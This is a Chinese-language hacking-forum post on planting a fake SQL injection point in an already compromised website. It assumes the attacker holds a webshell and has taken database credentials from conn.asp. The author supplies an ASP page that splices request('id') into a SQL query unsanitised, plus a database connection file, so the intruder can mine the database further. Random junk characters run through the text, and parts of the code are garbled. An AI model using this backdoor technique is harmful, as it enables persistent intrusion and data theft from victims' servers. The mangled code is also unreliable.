自己构造注入点方便入侵# u- }2 u. C S, x. M1 G
. P' _5 o9 H# @1 I7 c! C今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息6 Z( u8 M; I4 o, l; m- X0 {9 |8 S% r
: L7 ]! h/ b. f
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!) a. O, D0 g8 L& u4 m
4 ^: ]7 S- C/ z: F首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和& w- c. m- [& M* ~3 x% }0 I- {4 F
9 O) h6 p9 G( J5 g9 z+ I* J! ~& u密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表. q6 ~" n. Z6 z5 F9 X" A) ?) {6 B0 A
: X% T( K) X7 p0 m. b因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:$ M5 c) D' M+ Z6 y2 l8 g3 z
$ U. Q$ m0 X2 \- o% R* z% Y程序代码# V! C0 q3 Y8 O, t4 h, S
<!--#include file="xx.asp"-->
% k8 P9 B# V( \<%
6 U+ ~& L1 g1 p0 s2 }, Nset rs=server.createobject("ADODB.recordset")
) a' |! H0 R, X2 H lid = request("id")! @) C$ ^2 y! z5 t8 f% H
strSQL = "select * from admin where id=" & id
) _+ v$ g, S/ }8 \9 urs.open strSQL,conn,1,3
! W3 H# D& w' jrs.close- C# G! l# |; ]. S( ~ e5 D- ^
%>/ Y3 w0 {0 W3 |! E2 Y5 z
2 H% @! m" T" W把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
6 F9 i; {0 R, S
; N. r- ~0 h3 h2 d你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!, i4 x, D* s: ~* p$ l3 C, @
. ]* X" x2 w4 z
然后就要构造一个连接数据库的文件了,代码如下:
2 c6 C- q) y3 F W$ ? M程序代码! ]" K- [7 t/ a' \8 b& S
<% 1 P! F* A) U' V9 l/ I
strSQLServerName = "000.000.000.000" '服务器名称或地址1 W' t$ J9 G: }% P0 W6 W& c" l# ]
strSQLDBUserName = "sqlname" '数据库帐号
$ |3 c0 `! z' Q) O% l- ]! NstrSQLDBPassword = "sqlpass" '数据库密码" b: Q2 X8 R/ f+ ~
strSQLDBName = "sqldataname" '数据库名称
% m4 a; ^. @$ X$ E# x7 G; eSet conn = Server.CreateObject("ADODB.Connection")
7 v4 x% A4 m3 A" g' ustrCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"1 b+ k) r$ c% {+ G. N3 ^0 K S: g
conn.open strCon
: N+ E5 U& ?2 a' C%>1 k1 d0 \+ m8 b' `; `* e, D7 r
4 J* O$ t; w; E1 t% t这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
7 V/ w+ ? Q g7 ?- g6 {5 @# I9 c4 B6 k
B- I2 u6 ~ \5 {1 K就这样,正常情况下,就OK了,伪造成功……
4 ^9 I; v H& B2 d
* e: V" H, w+ F0 k' ~( f 如果有什么问题可以提出来大家一起探讨解决。 |